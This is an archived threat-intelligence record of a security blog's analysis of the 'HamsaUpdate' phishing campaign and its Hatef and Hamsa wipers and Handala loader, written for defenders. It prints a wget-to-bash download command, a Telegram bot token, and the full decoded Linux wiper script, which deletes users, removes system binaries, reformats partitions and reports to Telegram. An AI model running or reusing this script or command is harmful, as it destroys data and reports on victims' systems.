{
	"id": "653f7be6-9831-444e-a634-330de185d7d9",
	"created_at": "2026-04-06T00:08:28.599571Z",
	"updated_at": "2026-04-10T13:11:25.240172Z",
	"deleted_at": null,
	"sha1_hash": "869364ef84d5105b33f8f2006e3d047998a7565e",
	"title": "Operation HamsaUpdate: A Sophisticated Campaign Delivering Wipers Puts Israeli Infrastructure at Risk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2773402,
	"plain_text": "Operation HamsaUpdate: A Sophisticated Campaign Delivering Wipers\r\nPuts Israeli Infrastructure at Risk\r\nBy Research Team\r\nPublished: 2023-12-20 · Archived: 2026-04-02 11:25:21 UTC\r\nWritten by Nicole Fishbein and Ryan Robinson\r\nOn December 19th, the Israel National Cyber Directorate released an urgent alert warning regarding a phishing campaign\r\nactively targeting Israeli customers using F5’s network devices. We’ve labeled this campaign Operation HamsaUpdate. It\r\nfeatures the deployment of a newly developed wiper malware that targets both Windows and Linux servers. The campaign\r\nleverages a convincingly written email in Hebrew and utilizes sophisticated social engineering techniques, pressuring\r\nvictims to execute the harmful code residing on their servers. The final attack delivers a complex, multi-stage loader or a\r\ndestructive wiper, each variant customized for either Linux or Windows environments.\r\nTo help identify and combat this threat, the Israel National Cyber Directorate has made public the Indicators of Compromise\r\n(IOCs) associated with this campaign, including variants of the wiper malware. We’ve dubbed the Windows variant ‘Hatef’\r\nand the Linux variant ‘Hamsa’. During our analysis, we unearthed a second-stage loader coded in Delphi—which\r\nspearheads the execution of an AutoIt injector. This injector has been given the name ‘Handala’.\r\nThe following blog post presents a detailed technical examination of the various threats contained within the Operation\r\nHamsaUpdate.\r\nInfection Vector: Phishing Email\r\nThe attack is initiated with a cleverly crafted phishing email that stands out for its impeccable Hebrew, free of the typical\r\nmisspellings or grammatical errors often seen in such schemes. The email’s content showcases a sophisticated level of social\r\nengineering, creating a compelling sense of urgency that is highly persuasive to the recipient.\r\nCentral to the attackers’ strategy is adopting a phishing theme that exploits the recent vulnerability discovery in F5’s BIG-IP\r\nplatform. BIG-IP represents an advanced iteration of Application Delivery Controller (ADC) technology and is integral to\r\nmany organizations’ network infrastructures. The email convincingly warns the victim that this critical vulnerability has led\r\nto a compromise within their organization. It presses the urgency of the matter, imploring the recipient to take immediate\r\naction by adhering to the directives enclosed in the email.\r\nScreenshot of the phishing email published by the Israel National Cyber Directorate.\r\nIn a detailed and deceptive request, the victim is instructed to run a specific file across all their Linux and Windows servers,\r\nexplicitly including backup and even localized servers, to address the issue ostensibly. For Linux servers, the email\r\ncunningly guides the victim in utilizing root privileges to execute a wget command. Meanwhile, Windows server\r\nadministrators are instructed to open and execute an attached archive ZIP file.\r\nBy leveraging a well-known and trusted platform’s vulnerability and employing highly convincing communication, the\r\nattackers demonstrate advanced tactics designed to manipulate their targets into unknowingly compromising their own\r\nnetwork’s security.\r\nHacktivism? \r\nA group calling itself “Handala Hack Team” has claimed responsibility for recent cyber attacks. They present themselves as\r\na newly formed pro-Palestinian activist group, yet their identity behind the social media profiles remains uncertain. Handala\r\nHack has set up various social media accounts, including on Telegram, Tox, Twitter, and BreachForums, and has also\r\nlaunched their own website, which is currently incomplete. As they reported the attacks in real-time, they also mocked the\r\nIsrael National Cyber Directorate (INCD). Their website’s purpose is still unclear, but it may be intended for publicizing\r\ninformation about hacked targets.\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 1 of 10\n\nHadala Hack Team website.\r\nPosts on social media by Handala Hack Team.\r\nThe group appears to be targeting social media to gain attention for their activist hacking. They have produced a video and\r\nare actively tagging Israeli news agencies, influencers, and figures in the cybersecurity industry. Their posts are being shared\r\non all their social media platforms.\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 2 of 10\n\nThe video created by Handala Hack Team.\r\nThe group sent an email to Twitter influencer @DailyDarkWeb claiming that they targeted Israeli government entities,\r\ndestroying 10TB of data. No evidence has been provided yet for these claims. \r\nBesides the group’s claims, we can’t make attribution since there is insufficient evidence. Moreover, there’s a known\r\ntactic where false activist personas are crafted to imply that independent activists, rather than government organizations, are\r\nbehind cyberattacks.\r\nTechnical Analysis\r\nThe Loader\r\nFor the Windows variant, there are two known variants of ZIP files that are delivered. Both ZIP files contain only one file,\r\nan exe named F5UPDATER.EXE, which is a .NET application that is disguised as a system update tool of F5. It serves as\r\nthe first stage loader of the attack. \r\nIn both cases, the loader is implemented in C#, using the same namespace called SecureDeleteFiles and defining a class\r\nFrmMain. In both cases, the form includes a progress bar (prgStatus), a picture box (pictureBox1), a label (label1), and a\r\nbutton (btnDeleteAllFiles).\r\nBoth files extract assembly from the resource section. The payload is written to System32 and executed.\r\nThe difference between the two archive variants is the payload in the resource. The loader\r\n(fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2) extracts a resource called Hatef.exe which is\r\nthe executable for the wiper. \r\nThe second loader variant (ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a) has two resources.\r\nOne is Hatef.exe, and the other one, which is being extracted, is a resource called Handala.exe written in Delphi. The term\r\nHandala refers to a renowned national emblem and embodiment of the Palestinian people. Prior to that, the loader checks if\r\nthe file already exists in the System32 directory. If the file exists, it is deleted. In the following variant, the wiper Hatef is\r\nnot used.\r\nArchive SHA256 Type Loader SHA256\r\n64c5fd791ee369082273b685f724d5916bd4cad756750a5fe953c4005bb5428c ZIP\r\nca9bf13897af109cb354f2629c10803966eb757ee4b2e4\r\n454e6d3782f23455875a5db64e1a8cd8eb743400d8c6d\r\nad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a ZIP fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 3 of 10\n\nWindows Payload: Hatef Wiper\r\nThe Windows wiper is internally identified by the Persian name “Hatef“. The wiper starts out by retrieving its current\r\nprocess name and checking for other processes with the same name excluding its own process ID (with guardrails for\r\nmatching session IDs and executable paths). This step functions as a singleton check designed to prevent multiple instances\r\nof the malware from running simultaneously. If there is already a running instance of the wiper, it sets a specific flag, stops\r\nfurther actions, and terminates prematurely. \r\nIf the singleton check succeeds, the Hatef Wiper checks for Administrator privileges. If such privileges are missing, the\r\nwiper presents a message box, suggesting it is an updater requiring Administrator access to proceed, a tactic likely intended\r\nto coax the user into granting elevated permissions.\r\nThe program checks if command-line arguments are passed during its initiation. If the command-line argument does not\r\nmatch “ConfirmDeleteFiles”, the wiper cunningly displays a confirmation message box asking for user affirmation\r\nregarding a purported system update, adding another layer to its deceptive facade. Should the user approve, or if the action is\r\nauthorized via the command line, a duplicitous message appears, falsely stating: “The system has been successfully\r\nupdated!”\r\nNext, it spawns a new class instance named Service and invokes its Run method. This is where the wiper’s core logic comes\r\nto life, establishing multiple lists that maintain a record of directories and files spread across various locations on the system,\r\nincluding the Users, Program Files, and Windows directories.\r\nThe program employs a method called OverwriteFileBlockAndDelete to overwrite files with 4096-byte blocks of random\r\ndata and subsequently delete them. It skips files that are part of the malware’s executable process or are located on a\r\nmachine named “HANDALA”. Handala is the name of the resource and the likely name of the developer’s machine. If a file\r\ncannot be overwritten due to an error, its path is earmarked in a secondary list (filesOtherDrives) for later attention.\r\nImplementation of OverwriteFileBlockAndDelete\r\nThe malware wipes key system paths across all connected drives, focusing on directories within “Users,” “Program Files,”\r\n“Program Files (x86),” and “Windows,” employing the ProcessDirectory method to enumerate all files within these paths\r\nrecursively. Once files are deleted, and directories are left empty, it uses an incorrectly spelled method, DeleteDrirectorys,\r\nto remove these now-obsolete directories.\r\nDuring its operation, the wiper sends periodic updates to a predetermined Telegram chat, likely to inform its controllers\r\nabout the ongoing progress or notify them when the task is completed. The dispatched information comprises the external IP\r\naddress of the infected computer, the hostname, a timestamp, and a count of “Undeleted files” within critical file system\r\nlocations such as the Windows directory and Program Files directories. This count is formatted to show the number of files\r\nthat the malware has not managed to delete up to that point. This communication strategy serves as a means of real-time\r\nreporting on malicious activities, offering the attackers updates and insights into the efficacy of their attack.\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 4 of 10\n\nAnalysis of Hatef Wiper\r\nLinux Payload: Hamsa Wiper\r\nThe analysis of the downloaded script revealed an obfuscated payload concealed within. The payload, obscured using a\r\nseries of five Base64 encoding steps, is executed using the ‘eval’ command. Upon decoding, it reveals a bash script\r\nengineered to conduct a data-wiping operation. The decoded script is in the IOCs section. Because there are five Base64\r\noperations on that script. We named the wiper Hamsa (five in Arabic).\r\nwget -O - https://sjc1.vultrobjects.com/f5update/update.sh | bash\r\nAfter masquerading as a routine update, the script strategically pauses for 30 minutes. This delay creates a deceptive\r\nappearance of typical system behavior during this period. In the meantime, the script accomplishes reconnaissance to\r\nidentify the Linux distribution in use, whether it be Red Hat, Ubuntu, or Debian. Subsequently, it quietly installs necessary\r\ntools, such as xfsprogs, wipe, and parted, which are pivotal for later tasks involving disk partition manipulation and the\r\nsecure erasure of data.\r\nLike its Windows variant, this wiper version transmits data to the same Telegram channel. The shared information aligns\r\nwith what’s sent by the Windows variant but adds specific details, such as the system directory’s drive letter and prepared\r\ninformation on disk space. The data is organized with clear headers and separators to facilitate understanding, forming a\r\nstructured log that allows the attackers to track and assess the impact of their infiltration.\r\nProgressing with malicious intentions, the script enumerates all user accounts with an ID number exceeding 999. It\r\nsystematically eliminates these accounts and obliterates their associated files. This is achieved by harnessing the secure\r\ndeletion capabilities of the wipe command within the users’ home directories.\r\nAdditionally, the script outlines a function called remove_os_file. This function is designed to delete important system files\r\nin key folders like /bin, /sbin, /usr/bin, and /usr/sbin. Interestingly, it does not delete the files for rebooting the system or\r\nremoving files (reboot and rm utilities), which hints that they might be needed for later parts of the process.\r\nNext, the wiper checks the mounted partitions—excluding the root partition—by unmounting them and then initializing a\r\nnew GPT partition table. It generates a new partition, conducts an integrity check via parted, and invokes a part probe to re-read the partition table. Finally, it formats the newly created partition using the XFS file system, obliterating any data\r\nremnants on these partitions.\r\nUpon the successful wiping of the file systems, the script once again utilizes the send_telegram_message function to report\r\nthe completion of the “cleaning process” to its operators via Telegram. Lastly, the script invokes the remove_os_file function\r\nto wipe system binaries. Then, it ensures the system’s inability to recover by executing a reboot command to restart the\r\ncompromised machine, leaving it inoperable.\r\nInfrastructure \r\nThe wiper sends reconnaissance information to a Telegram channel. In both the Windows and the Linux variants, the Bot ID\r\nand the Channel ID are identical. \r\nBot Id: 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA\r\nChannel Id: 6932028002\r\nDelphi Loader: Handala\r\nAs previously noted, one of the loaders unpacks a Delphi second-stage loader named Handala. The core logic of the loader\r\nis within a function known as PixLawsuit. The loader conceals its strings with a simple obfuscation method that involves the\r\nuse of an ADD operation.\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 5 of 10\n\nOnce initiated, Handala executes an obfuscated script called Closest. Its goal is to detect any active security software that\r\ncould disrupt the attack’s progression and disable it. This is achieved by listing all active tasks and filtering for names of\r\nprocesses typically associated with security applications using the findstr command.\r\ntasklist\r\nfindstr.exe findstr /I \"avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe\"\r\nfindstr /I \"wrsa.exe\"\r\nNext, Handala concatenates the contents of files named Bw, Vessels, Boy, and Conventions into a unified file called\r\nNaples.pif, which is located within a directory it creates for this purpose. Similarly, it concatenates content from files named\r\nBeastiality, Bicycle, and Employee into another single file named ‘k‘ within the same folder. After this consolidation\r\nprocess, Handala executes the Naples.pif file while supplying ‘k’ as an argument.\r\ncmd.exe 1428 cmd /c mkdir 30828\r\ncmd.exe 792 cmd /c copy /b Bw + Vessels + Boy + Conventions 30828Naples.pif\r\ncmd.exe 2788 cmd /c copy /b Beastiality + Bicycle + Employee 30828k\r\nNaples.pif 30828Naples.pif 30828k\r\nThe file ‘Naples.pif’ is a renamed AutoIt interpreter, further advancing the attack sequence. A .pif (Program Information\r\nFile) extension could be a strategic move to camouflage the file as a shortcut reminiscent of those utilized in older Windows\r\noperating systems.\r\nThe AutoIt loader itself is not a new tool; it has established a reputation for delivering various forms of threats based on the\r\narguments it receives. For this particular attack, the argument fed to it is another obfuscated AutoIt script, indicative of the\r\nlayered complexity within this multifaceted cyber threat.\r\nSHA256 Type\r\nFile\r\nName\r\nf58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3\r\nAutoIt\r\nInterpreter\r\nNaples.pif\r\naae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4\r\nObfuscated\r\nAutoIt\r\nScript\r\nk\r\nIn this variant, the script is obfuscated and contains redundant function calls and meaningless strings. Each string is\r\nobfuscated through a simple encoding process. \r\nThis decoding process mirrors that of the Delphi loader, with the distinction that it utilizes the SUB operation instead. To\r\ndecode these strings, we must first eliminate the ‘^’ character. Afterward, we decode by subtracting the value of each\r\ncharacter in the garbled string from the value of the second parameter provided to the STAFFING function.\r\n$testamentquartermechanicsmechanical = DllStructCreate(STAFFING(\"107^130^125^110^100\",45/5) \u0026 BinaryLen($ProminentTechrep\r\nSnippet of the decoded AutoIt script. \r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 6 of 10\n\nUpon execution, the script’s primary task is to inject a piece of shellcode that implements the RC4 stream cipher. This\r\nshellcode’s purpose is singular – to decrypt another payload.\r\nRC4 shellcode used to decrypt payload.\r\nOnce decrypted, it is decompressed using RtlDecompressFragment, the algorithm that is being used is LZNT1. The product\r\nname and description based on exif information is FlashDevelop, and we will refer to it by this name. The purpose of\r\nFlashDevelop is to unpack and execute more shellcode into dialer.exe and dllhost.exe. The code injected into dllhost\r\ncommunicates with a C2 server over HTTPS at 31.192.237[.]207:2515. The geolocation of the IP is in Chelyabinsk, Russia.\r\nNext, the code is then injected into a Windows Media Player Process. The executable used varies each time (wmpshare.exe,\r\nwmpenc.exe, wmlaunch.exe etc.).\r\nProcess Hacker during the shellcode execution.\r\nThe Handala loader initiates a complex sequence involving a series of additional loaders, which encompass obfuscated\r\nscripts and shellcode. Although the ultimate objective of this orchestrated execution chain remains ambiguous, it clearly\r\nindicates a more intricate effort to compromise the target machine.\r\nSHA256 Type\r\n336167b8c5cfc5cd330502e7aa515cc133656e12cbedb4b41ebbf847347b2767\r\nWin32 EXE\r\n(FlashDevelop)\r\nConclusions\r\nThe Hamsa Wiper campaign represents a sophisticated and highly targeted attack on Israeli infrastructure. Using\r\nmeticulously written emails in Hebrew, attackers have wielded advanced social engineering techniques to deliver a multi-faceted malware package, ultimately wiping data across Windows and Linux servers.\r\nOur analysis highlighted key components of the malware, such as the intricate multi-stage loading process involving\r\nobfuscated scripts, the Delphi-coded second-stage loader, and the Handala AutoIt injector. By utilizing this complex chain,\r\nthe malware bypassed traditional security measures resulting in a robust and effective cyber attack.\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 7 of 10\n\nIOCs\r\n31.192.237[.]207:2515 \r\nhttps://sjc1.vultrobjects.com/f5update/update[.]sh\r\nSHA256 Type Filename Signed?\r\nfe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2\r\nWindows\r\nExecutable.NET F5UPDATER.exe\r\nYessignature:F5UPD\r\nca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a\r\nWindows\r\nExecutable.NET\r\nF5UPDATER.exe Yessignature:F5UPD\r\ne28085e8d64bb737721b1a1d494f177e571c47aab7c9507dba38253f6183af35\r\nWindows\r\nExecutable.NET\r\nHatef.exe No\r\n454e6d3782f23455875a5db64e1a8cd8eb743400d8c6dadb1cd8fd2ffc2f9567 \r\nWindows\r\nExecutableDelphi\r\nHandala.exe No\r\n6f79c0e0e1aab63c3aba0b781e0e46c95b5798b2d4f7b6ecac474b5c40b840ad\r\nEncrypted bash\r\nscript\r\nupdate.sh –\r\nad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a ZIP –\r\n64c5fd791ee369082273b685f724d5916bd4cad756750a5fe953c4005bb5428c ZIP –\r\n336167b8c5cfc5cd330502e7aa515cc133656e12cbedb4b41ebbf847347b2767\r\nWindows\r\nExecutable\r\nFlashDevelop No\r\nf58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3 AutoIt Interpreter Naples.pif No\r\naae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4\r\nObfuscated\r\nAutoIt Script\r\nk No\r\n8f69c9bb80b210466b887d2b16c68600\r\n8bdd1cb717aa2bd03c12c8b4c9df2d94\r\nDecoded update.sh script – Linux Wiper Version:\r\n#!/bin/bash\r\necho \"\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n********************************,,,,,,,,,,,,,,,,,*******************************\r\n************************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***********************\r\n********************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*******************\r\n****************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***************\r\n*************,,,,,,,,,,,,,,\u0026@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,************\r\n***********,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@*,,,,,@@@@@@@@@@@@@@*,,,,,,**********\r\n********,,,,,,,,,@@@@@@@@@@,,,,,,,,,@@@@@@@@,,,,@@@@@@@@@@@@@@@@@@@@@@@@********\r\n*******,,,,,,,@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,*@@@@@@@@@@@@@@@@@@@@@@@@@,******\r\n*****,,,,,,,/@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@,,,****\r\n****,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,@@@@@,,,,,,,,,,,,,,,,,,,/@,,,,,***\r\n***,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,**\r\n**,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,@@@@@@@@\u0026,,,,,,,,,,,,,,,,,,,,,,,,,,*\r\n*,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,*\r\n*,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,*@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@*,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,\r\n,,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,\r\n,,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@*,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@(,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@,,,\r\n**,,,,,,,,(@@@@@@@@@@@@@@#,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(@@@@@@@@@@@@@,,*\r\n***,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@\u0026,**\r\n****,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,@@@@,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@,***\r\n*****,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,@@@@@@@@,,,,,,,,,,,,,,,,,,,,,@@@@@@@@*,****\r\n******,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,@@@@@@@@@@,,,,,,,,,,,,,,,,,,@@@@@@@@,******\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 8 of 10\n\n*********#@@@@@@@@@@@@@@@@,,,,,,,,,,,,\u0026@@@@@@@@@@,,,,,,,,,,,,,,@@@@@@@,,,*******\r\n**********@@@@@@@@@@@@@@@@@@@@@@@(,,,,,*@@@@@@@@@@@@@@%//%@@@@@@@@,,,,,*********\r\n*************,,,,,,,,,,,,,,*\u0026@@@@@@,,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,************\r\n***************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*********,****\r\n*******************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***********,,*,***\r\n***********************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***************,,*****\r\n******************************,,,,,,,,,,,,,,,,,,,,,*****************************\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@,,@/,,@@@@,,@@@@@@@@#,,@,,@@@@@,,@@,,@@@@@,,@@,,@@@@@,,@@@@@@,,@@@@@@,,,@,,@@\r\n@@@,,,,,@@@@@,,,,,@@@@@,,@@@@@@@@@,,@@,,@@@@@,,,,,,@@@@@,,@@@@@@,,@@@@@@@@,,@@@@\r\n@@,,,@,,,@@@@,,,,,,@@@@@,,@,,@@@@@,,,@,,@@@@@,,@@,,@@@@@,,@@@@@@,,@@@@@@@@,,@@@@\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@@@\u0026\u0026@@@\u0026@@@@@\u0026\u0026\u0026\u0026@@@@@@@\u0026\u0026\u0026@@@@@@@@@@\u0026\u0026@@@@@@@\u0026\u0026\u0026\u0026\u0026@@@@@\u0026\u0026\u0026\u0026\u0026@@@@@\u0026\u0026\u0026\u0026@@@@@@@\r\n@@@@@,,@@@,@@@@@,,@@@,,@@@@,,@@(,,@@@@@#,,,@@@@@@@@,@@@@@@@,,@@@@@@@@,,@@@,,@@@@\r\n@@@@@,,@@@,@@@@@,,,,,@@@@@@,,@@@,,@@@@@,,,,,@@@@@@@,@@@@@@@,,@@@@@@@@,,,,,@@@@@@\r\n@@@@@@,,,,,@@@@@,,@@@@@@@@@,,,,,,@@@@@,%@@@,,@@@@@@,@@@@@@@,,,,,@@@@@,,@@,,@@@@@\r\n \"\r\nfor ((i=0; i\u003c30; i++))\r\ndo\r\n echo -n \"#\"\r\n sleep 1\r\ndone\r\necho \"\"\r\nsleep 25\r\necho \"The system has been updated successfully!\"\r\n(\r\nsleep 1800\r\necho \"The final update is being applied...\"\r\nif [[ -f /etc/redhat-release ]]; then\r\n sudo yum install xfsprogs wipe parted -y \u003e /dev/null 2\u003e\u00261\r\nelif [[ \"$(lsb_release -is)\" == \"Ubuntu\" ]]; then\r\n sudo apt update\r\n sudo apt install xfsprogs wipe parted -y \u003e /dev/null 2\u003e\u00261\r\nelif [[ \"$(lsb_release -is)\" == \"Debian\" ]]; then\r\n sudo apt update\r\n sudo apt install xfsprogs wipe parted -y \u003e /dev/null 2\u003e\u00261\r\nelse\r\n echo \"Unsupported OS.\"\r\n exit 1\r\nfi\r\ntelegram_bot_token=\"6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA\"\r\ntelegram_chat_id=\"6932028002\"\r\nsend_telegram_message() {\r\n IFS= read -r -d '' message \u003c\u003c EOF\r\nCleaning process started on server HOST: $(hostname)\r\nIP: $(hostname -I)\r\nDisk volumes:\r\n$(df -h --output=source,size,target)\r\nEOF\r\n curl -s --retry 3 --retry-delay 5 -X POST \"https://api.telegram.org/bot$telegram_bot_token/sendMessage\"\r\n -d \"chat_id=$telegram_chat_id\"\r\n -d \"text=$message\"\r\n -H \"Content-Type: application/x-www-form-urlencoded\"\r\n}\r\nsend_telegram_message \u003e /dev/null 2\u003e\u00261\r\nremove_all_users() {\r\nfor username in `awk -F: '$3 \u003e 999 {print $1}' /etc/passwd`\r\n do\r\n deluser --remove-all-files -q $username \u003e /dev/null 2\u003e\u00261\r\n userdel -r $username \u003e /dev/null 2\u003e\u00261\r\n wipe -rfi /home/$username/* \u003e /dev/null 2\u003e\u00261\r\n done\r\n}\r\n##########################################################################################\r\nremove_os_file() {\r\n reboot_path=`which reboot`\r\n rm_path=`which rm`\r\nfor file in /bin/* /sbin/* /usr/bin/* /usr/sbin/*; do\r\n if [[ \"$file\" != \"$reboot_path\" \u0026\u0026 \"$file\" != \"$rm_path\" ]]; then\r\n if [[ \"$file\" != \"$reboot_path\" \u0026\u0026 \"$file\" != \"$rm_path\" ]]; then\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 9 of 10\n\nrm -f $file \u003e /dev/null 2\u003e\u00261\r\n fi\r\n fi\r\ndone\r\n}\r\n#########################################################################################\r\nremove_file_system() {\r\nmounted_partitions=$(df -h | awk '{if (NR\u003e1) print $6}')\r\nroot_partition=\"/\"\r\nfs_type=\"xfs\"\r\nstart=\"0%\"\r\nend=\"100%\"\r\nfor partition in $mounted_partitions\r\ndo\r\n \r\n if [[ $partition != $root_partition ]]; then\r\n device_name=`mount | grep $partition |awk '{print $1}'`\r\n if [[ $device_name == /dev* ]]; then\r\n echo $device_name\r\n umount -lv $partition \u003e /dev/null 2\u003e\u00261\r\n parted -s $device_name mklabel gpt -- \u003e /dev/null 2\u003e\u00261\r\n \r\n parted -s $device_name mkpart primary $fs_type $start $end -- \u003e /dev/null 2\u003e\u00261\r\n \r\n parted -s $device_name ignore-optimization check \u003e /dev/null 2\u003e\u00261\r\n partprobe $device_name \u003e /dev/null 2\u003e\u00261\r\n # Format the new partition\r\n mkfs.$fs_type -f ${device_name} \u003e /dev/null 2\u003e\u00261\r\n fi\r\n fi\r\ndone\r\n}\r\n###############################################################################################\r\nremove_all_users\r\nremove_file_system\r\nsend_telegram_message() {\r\n IFS= read -r -d '' message \u003c\u003c EOF\r\nCleaning process completed on server HOST: $(hostname)\r\nIP: $(hostname -I)\r\nDisk volumes:\r\n$(df -h --output=source,size,target)\r\nEOF\r\n curl -s --retry 3 --retry-delay 5 -X POST \"https://api.telegram.org/bot$telegram_bot_token/sendMessage\"\r\n -d \"chat_id=$telegram_chat_id\"\r\n -d \"text=$message\"\r\n -H \"Content-Type: application/x-www-form-urlencoded\"\r\n}\r\nsend_telegram_message \u003e /dev/null 2\u003e\u00261\r\nremove_os_file\r\nreboot\r\n) \u0026\r\nSource: https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/"
	],
	"report_names": [
		"stealth-wiper-israeli-infrastructure"
	],
	"threat_actors": [
		{
			"id": "d0fef355-9eb9-4adc-8d90-a8c7494c4a81",
			"created_at": "2024-01-18T02:02:34.735032Z",
			"updated_at": "2026-04-10T02:00:05.011663Z",
			"deleted_at": null,
			"main_name": "Handala Hack Team",
			"aliases": [
				"Operation HamsaUpdate"
			],
			"source_name": "ETDA:Handala Hack Team",
			"tools": [
				"Hamsa Wiper",
				"Handala",
				"Hatef Wiper"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4134675e-5b72-4b50-8d70-1a8f18aafbb4",
			"created_at": "2024-10-04T02:00:04.766263Z",
			"updated_at": "2026-04-10T02:00:03.715945Z",
			"deleted_at": null,
			"main_name": "Handala",
			"aliases": [],
			"source_name": "MISPGALAXY:Handala",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb",
			"created_at": "2025-08-07T02:03:24.769383Z",
			"updated_at": "2026-04-10T02:00:03.860954Z",
			"deleted_at": null,
			"main_name": "COBALT MYSTIQUE",
			"aliases": [
				"Banished Kitten ",
				"DEV-0842 ",
				"Druidfly ",
				"Handala Hack Team",
				"Homeland Justice",
				"Karmabelow80",
				"Red Sandstorm ",
				"Storm-0842 ",
				"Void Manticore "
			],
			"source_name": "Secureworks:COBALT MYSTIQUE",
			"tools": [
				"AllinOneNeo",
				"Bibi",
				"GramPy",
				"GramPyLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434108,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/869364ef84d5105b33f8f2006e3d047998a7565e.pdf",
